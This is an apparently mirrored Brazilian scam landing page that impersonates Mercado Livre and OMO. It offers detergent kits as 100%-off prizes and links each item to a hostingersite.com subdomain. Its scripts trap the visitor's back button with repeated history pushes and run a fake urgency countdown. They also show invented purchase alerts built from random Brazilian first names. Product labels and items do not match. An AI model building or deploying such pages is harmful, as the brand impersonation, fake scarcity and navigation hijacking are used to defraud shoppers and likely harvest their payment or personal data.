<html lang="pt-br"><head>
  
  <meta charset="UTF-8">
<script>
  // ALTERE O LINK PARA A PÁGINA QUE QUISER MOSTRAR QUANDO O USUÁRIO TENTAR SAIR
  const link = '';

  function setBackRedirect(url) {
    let urlBackRedirect = url;
    urlBackRedirect = urlBackRedirect =
      urlBackRedirect.trim() +
      (urlBackRedirect.indexOf('?') > 0 ? '&' : '?') +
      document.location.search.replace('?', '').toString();

    history.pushState({}, '', location.href);
    history.pushState({}, '', location.href);
    history.pushState({}, '', location.href);

    window.addEventListener('popstate', () => {
      console.log('onpopstate', urlBackRedirect);
      setTimeout(() => {
        location.href = urlBackRedirect;
      }, 1);
    });
  }

  setBackRedirect(link);
</script>

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Mercado Livre</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="images/favicon.png">
    <link rel="shortcut icon" href="images/favicon.png">
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles2.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
    <style>
      .free-shipping-container {
        margin-bottom: 6px;
      }

      .estoque {
        font-size: 10pt;
        padding: 3px;
      }

      .estoque-verde {
        color: #005484;
        background-color: #ffffc7;
      }

      .estoque-amarelo {
        color: rgb(0, 84, 132);
        background-color: #ffffc7;
      }

      .estoque-vermelho {
        color: #ff2e2e;
        background-color: #723636;
      }

      .product-name {
        margin-top: 5px;
      }
    </style>
<meta charset="utf-8">

  </head>
  <body>
    <div style="background-color: #163054; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: #ffffff">Parabéns você é um super ganhador!</div>
    <nav class="navbar" style="padding-top: 15px;">
      <div class="menu-icon" style="padding-left: 3%;">
        <img src="images/logo.webp" style="height: 5vh;" alt="Logo Central Vivara">
      </div>
      <div class="logo-central"></div>
      <div class="menu-icon" style="padding-right: 3%;">
        <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: black">menu</span>
      </div>
    </nav>
    <img src="images/BANNER%20ML.png" style="width: 100%; margin-top: -2px;">

<!-- BANNER GRADIENTE -->
<div style="
    width: 90%;
    margin: 10px auto;
    border-radius: 8px;
    background: linear-gradient(to right, #011E51, #ff2e2e);
    padding: 10px;
    color: #fff;
    font-family: 'GellixMedium';
    text-align: center;
">
  Produtos Disponível
  <span style="font-size: 12px;">
    Tempo restante: <span id="countdown">01:42:38</span>
  </span>
</div>

<script>
  const countdown = document.getElementById("countdown");
  let [h, m, s] = countdown.textContent.split(":").map(Number);
  const timer = setInterval(() => {
    if (--s < 0) s = 59, m--;
    if (m < 0) m = 59, h--;
    if (h < 0) clearInterval(timer), countdown.textContent = "Oferta Expirada";
    countdown.textContent = `${h.toString().padStart(2, "0")}:${m.toString().padStart(2, "0")}:${s.toString().padStart(2, "0")}`;
  }, 1000);
</script>






    <div class="bracelet-grid">
      <div class="bracelet-item" onclick="window.location.href = 'https://slategrey-weasel-119973.hostingersite.com/caixa-de-som-party' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Caixa de Som Party'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/som01.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">KIT DO DIA</div>
          <div class="old-price">R$ 265,00</div>
          <span class="new-price">R$ 00,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #0315b3; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-verde">Restam 3 unidades</span>
          <p class="product-name">Kit 3 Sabão Líquido
2 Sabão em Pó <span style="font-family: 'GellixBold';"></span>
            </p>
            
<p></p>
</div>
      </div>
      <div class="bracelet-item" onclick="window.location.href='https://slategrey-weasel-119973.hostingersite.com/caixa-de-som-partybox-encore' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Caixa De Som Partybox Encore Com Microfone Jbl Preta'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/caixa001.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">KIT DO DIA</div>
          <div class="old-price">R$ 189,00</div>
          <span class="new-price">R$ 00,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #0315b3; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 7 unidades</span>
          <p class="product-name">  Kit 2 Sabão Líquido
3 Sabão em Pó <span style="font-family: 'GellixBold';"></span></p>
          <p></p>
<p></p>
</div>
      </div>
      <div class="bracelet-item" onclick="window.location.href='https://slategrey-weasel-119973.hostingersite.com/caixa-de-som-boombox-plus' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Caixa De Som Boombox Plus Com 3 Alto-falantes 200w Aiwa'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/boombox%20%281%29.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">KIT DO DIA</div>
          <div class="old-price">R$ 188,00</div>
          <span class="new-price">R$ 00,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #0315b3; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 10 unidades</span>
          <p class="product-name">Kit 2 Sabão Líquido Omo Lavagem Perfeita 7L  <span style="font-family: 'GellixBold';"></span></p>
          <p></p>
<p></p>
</div>
      </div>
      <div class="bracelet-item" onclick="window.location.href='https://slategrey-weasel-119973.hostingersite.com/caixa-de-som-xplosion-pulse' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Caixa De Som Xplosion 3 100w Bt/usb/aux/tws Pulse - Sp620'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/pulse%201.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">KIT DO DIA</div>
          <div class="old-price">R$ 138,99</div>
          <span class="new-price">R$ 00,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #0315b3; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 13 unidades</span>
          <p class="product-name">Kit 2 Sabão Líquido OMO Lavagem Perfeita <span style="font-family: 'GellixBold';"></span></p>
          <p></p>
<p></p>
</div>
      </div>
      <div class="bracelet-item" onclick="window.location.href='https://slategrey-weasel-119973.hostingersite.com/caixa-de-som-amplificada' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Caixa Amplificada Connect Lights Cm-400 Mondial 127/220V'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/caixadesomamplificada%20%284%29.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">KIT DO DIA</div>
          <div class="old-price">R$ 99,00</div>
          <span class="new-price">R$ 00,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #0315b3; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 18 unidades</span>
          <p class="product-name"> Kit 3 Sabão em Pó OMO Lavagem Perfeita Refil
 <span style="font-family: 'GellixBold';"></span></p>
          <p></p>
<p></p>
</div>
      </div>
    

    </div>
    <div class="divisoria2"></div>
    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;">
      <span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span>
      <br>
      <br>© 1999-2024 omo.com LTDA. CNPJ n.º 36.282.415/0001-42 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo omo. <span style="font-family: 'GellixSemiBold';">
        <br>
        <br>Brasil/Português </span>
    </p>


<script src="js/notiflix-aio-2.6.0.min.js"></script>

       <script> /right-top, right-bottom, left-top, left-bottom, center-top, center-bottom, center-center/
        var position = "left-bottom";
 
        /verde, azul, vermelho, amarelo/
        var color = "verde";
 
        /fade, zoom, from-right, from-left, from-top, from-bottom/
        var animation = "from-left";
 
        /nome do produto/
        var product_name = "";
 
        /frase depois do nome da pessoa/
        var phrase = "acabou de comprar com 95% de desconto";
        var timeout = 5000;
 
        /masc, fem, any/
        var type_name = "masc, fem";
        var msg_final = "";
 
        var min_time = 5;
        var max_time = 10;
 
        var names_masc = ['Jose', 'Joao', 'Antonio', 'Francisco', 'Carlos', 'Paulo', 'Pedro', 'Lucas', 'Luiz', 'Marcos', 'Luis', 'Gabriel', 'Rafael', 'Daniel', 'Marcelo', 'Bruno', 'Eduardo', 'Felipe', 'Rodrigo', 'Manoel', 'Mateus', 'Andre', 'Fernando', 'Fabio', 'Leonardo', 'Gustavo', 'Guilherme', 'Leandro', 'Tiago', 'Anderson', 'Ricardo', 'Marcio', 'Jorge', 'Alexandre', 'Roberto', 'Edson', 'Diego', 'Vitor', 'Sergio', 'Claudio', 'Matheus', 'Thiago', 'Geraldo', 'Adriano', 'Luciano', 'Julio', 'Renato', 'Alex', 'Vinicius', 'Rogerio', 'Samuel', 'Ronaldo', 'Mario', 'Flavio', 'Douglas', 'Igor', 'Davi', 'Manuel', 'Jeferson', 'Cicero', 'Victor', 'Miguel', 'Robson', 'Mauricio', 'Danilo', 'Henrique', 'Caio', 'Reginaldo', 'Joaquim', 'Benedito', 'Gilberto', 'Marco', 'Alan', 'Nelson', 'Cristiano', 'Elias', 'Wilson', 'Valdir', 'Emerson', 'Luan', 'David', 'Renan', 'Severino', 'Fabricio', 'Mauro', 'Jonas', 'Gilmar', 'Jean', 'Fabiano', 'Wesley', 'Diogo', 'Adilson', 'Jair', 'Alessandro', 'Everton', 'Osvaldo', 'Gilson', 'Willian', 'Joel', 'Silvio', 'Helio', 'Maicon', 'Reinaldo', 'Pablo', 'Artur', 'Vagner', 'Valter', 'Celso', 'Ivan', 'Cleiton', 'Vanderlei', 'Vicente', 'Arthur', 'Milton', 'Domingos', 'Wagner', 'Sandro', 'Moises', 'Edilson', 'Ademir', 'Adao', 'Evandro', 'Cesar', 'Valmir', 'Murilo', 'Juliano', 'Edvaldo', 'Ailton', 'Junior', 'Breno', 'Nicolas', 'Ruan', 'Alberto', 'Rubens', 'Nilton', 'Augusto', 'Cleber', 'Osmar', 'Nilson', 'Hugo', 'Otavio', 'Vinicios', 'Italo', 'Wilian', 'Alisson', 'Aparecido'];
        var names_fem = ['Maria', 'Ana', 'Francisca', 'Antonia', 'Adriana', 'Juliana', 'Marcia', 'Fernanda', 'Patricia', 'Aline', 'Sandra', 'Camila', 'Amanda', 'Bruna', 'Jessica', 'Leticia', 'Julia', 'Luciana', 'Vanessa', 'Mariana', 'Gabriela', 'Vera', 'Vitoria', 'Larissa', 'Claudia', 'Beatriz', 'Rita', 'Luana', 'Sonia', 'Renata', 'Eliane'];
 
        var option = {
            position: position,
            cssAnimationStyle: animation,
            plainText: false,
            timeout: timeout
        };
 
        function show_notification() {
            if (type_name == "masc") {
                msg_final = "<strong>" + names_masc[Math.floor(Math.random() * names_masc.length)] + "</strong>";
            } else if (type_name == "fem") {
                msg_final = "<strong>" + names_fem[Math.floor(Math.random() * names_fem.length)] + "</strong>";
            } else {
                var array_aux = ["masc", "fem"];
 
                if (array_aux[Math.floor(Math.random() * array_aux.length)] == "masc") {
                    msg_final = "<strong>" + names_masc[Math.floor(Math.random() * names_masc.length)] + "</strong>";
                } else {
                    msg_final = "<strong>" + names_fem[Math.floor(Math.random() * names_fem.length)] + "</strong>";
                }
            }
 
            msg_final += decodeURIComponent(escape(" " + phrase + " " + product_name));
 
            if (color == "verde") {
                Notiflix.Notify.Success(msg_final, option);
            }
 
            if (color == "azul") {
                Notiflix.Notify.Info(msg_final, option);
            }
 
            if (color == "vermelho") {
                Notiflix.Notify.Failure(msg_final, option);
            }
 
            if (color == "amarelo") {
                Notiflix.Notify.Success(msg_final, option);
            }
 
            var rand = Math.floor(Math.random() * (max_time - min_time + 1) + min_time);
            setTimeout(show_notification, rand * 1000);
        }
            setTimeout(show_notification, 7 * 1000);
</script></body><!-- Mirrored from exclusivalojas.com/loja/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 15 Oct 2024 14:43:04 GMT --></html>